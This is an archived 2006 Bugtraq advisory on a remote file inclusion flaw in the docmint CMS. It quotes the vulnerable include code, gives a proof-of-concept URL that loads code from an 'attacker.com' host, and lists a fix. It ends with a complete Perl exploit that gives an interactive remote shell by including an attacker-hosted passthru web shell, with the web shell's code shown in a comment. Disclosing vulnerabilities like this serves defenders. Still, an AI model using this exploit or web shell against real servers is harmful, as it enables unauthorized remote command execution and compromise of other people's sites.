[ECHO_ADV_51$2006] docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [ECHO_ADV_51$2006] docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Vulnerability
From: erdc@xxxxxxxxxx
Date: 9 Oct 2006 05:08:27 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

ECHO_ADV_51$2006

-----------------------------------------------------------------------------------------
[ECHO_ADV_51$2006] docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File 
Inclusion Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : Oct, 9th 2006
Location       : Australia, Sydney
Web            : http://advisories.echo.or.id/adv/adv51-K-159-2006.txt
Critical Lvl   : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : docmint 
version       : <= 2.0
URL           : http://www.docmint.net
Description :

Docmint is not a Wiki system. Docmint is a small,
multilingual CMS developed initially for online user manuals - 
like the one you are looking at. It features user comments, full text search, 
templated and customizable front end layout with example skins, code 
highlighting, 
fully localizable admin and public interface, file upload and attachment, image 
inclusion 
in the articles, a tree structure for articles, an easy install script, full 
Unicode-8 
support as well as an import function from structured HTML documents, topped 
with a WYSIWYSG editor in 
the admin interface. 
In short: Docmint was developed after an endless search for a simple version of 
the beloved 
functionality of the PHP.net website. The results you are looking at right now, 
published under GNU/GPL.
Docmint has a number of XML import and export functionality for migrating and 
backing up content as 
well as language packs. 
It currently also features the possibility of importing HTML documents 
generated from OpenOffice or Word 
into the database, using the level number of the header tags as the underlying 
structure for the document tree

---------------------------------------------------------------------------

Proof of Concept:
~~~~~~~~~~~~~~
Vulnerable Script engine/required.php .

---------------required.php--------------------------------
...
include_once "register_globals.php";

// one definite include so that we have the file functions for further include 
loops
include_once($MY_ENV['BASE_ENGINE_LOC']."/lib"."/func.files.php");

//include_once all the php files in the core lib folder
$libfiles = get_files($MY_ENV['BASE_ENGINE_LOC']."/lib", "php"); // look for 
php files in the lib folder
foreach ($libfiles as $libfile) {
    $includefile = $MY_ENV['BASE_ENGINE_LOC']."/lib"."/$libfile";
    include_once($includefile);
...
------------------------------------------------------------------

Variables $MY_ENV['BASE_ENGINE_LOC'] are not properly sanitized.
When register_globals=on and allow_fopenurl=on an attacker can exploit this 
vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~~

http://www.target.com/[docmint_path]/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=http://attacker.com/evil?

Solution:
~~~~~~~

- Sanitize variable $MY_ENV['BASE_ENGINE_LOC'] on affected files.
- Turn off register_globals

Notification:
~~~~~~~~~~

 vendor not contact yet

---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit, x16
~ newbie_hacker@xxxxxxxxxxxxxxx
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~

#!/usr/bin/perl
##
# docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit
# Bug Found & code By K-159 
##
# echo.or.id (c) 2006
# 
##
# usage:
# perl docmint.pl <target> <cmd shell location> <cmd shell variable>
#
# perl docmint.pl http://target.com/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
##
# #
#Greetz: My Dearest Wife - ping, echo|staff 
(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative), SinChan, 
sakitjiwa, maSter-oP, mr_ny3m, bithedz, lieur-euy, x16, mbahngarso, etc
# 
# Contact: www.echo.or.id #e-c-h-o @irc.dal.net
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
       print "[shell] \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET 
=>$Path.'engine/require.php?MY_ENV[BASE_ENGINE_LOC]='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
 die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[Ã&#402;.Ã&#8218;Âª]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: 
Cannot execute a blank command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command 
Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No 
Return\n\n"}

if($return =~ /(.*)/)


{
       $finreturn = $1;
       $finreturn=~ tr/[Ã&#402;.Ã&#8218;Âª]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print 
"\n============================================================================\r\n";
 print " *docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion 
Exploit*\r\n";
 print 
"============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl docmint.pl <target> <cmd shell location> <cmd shell 
variable>\r\n\n";
 print " <Site> - Full path to docmint ex: http://www.site.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g 
http://www.different-site.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print 
"============================================================================\r\n";
 print "                           Bug Found by K-159 \r\n";
 print "                    www.echo.or.id #e-c-h-o irc.dal.net 2006 \r\n";
 print 
"============================================================================\r\n";
 exit();
}

Prev by Date: SQL injection - 4images
Next by Date: SQL injection - moodle
Previous by thread: SQL injection - 4images
Next by thread: SQL injection - moodle
Index(es):
- Date
- Thread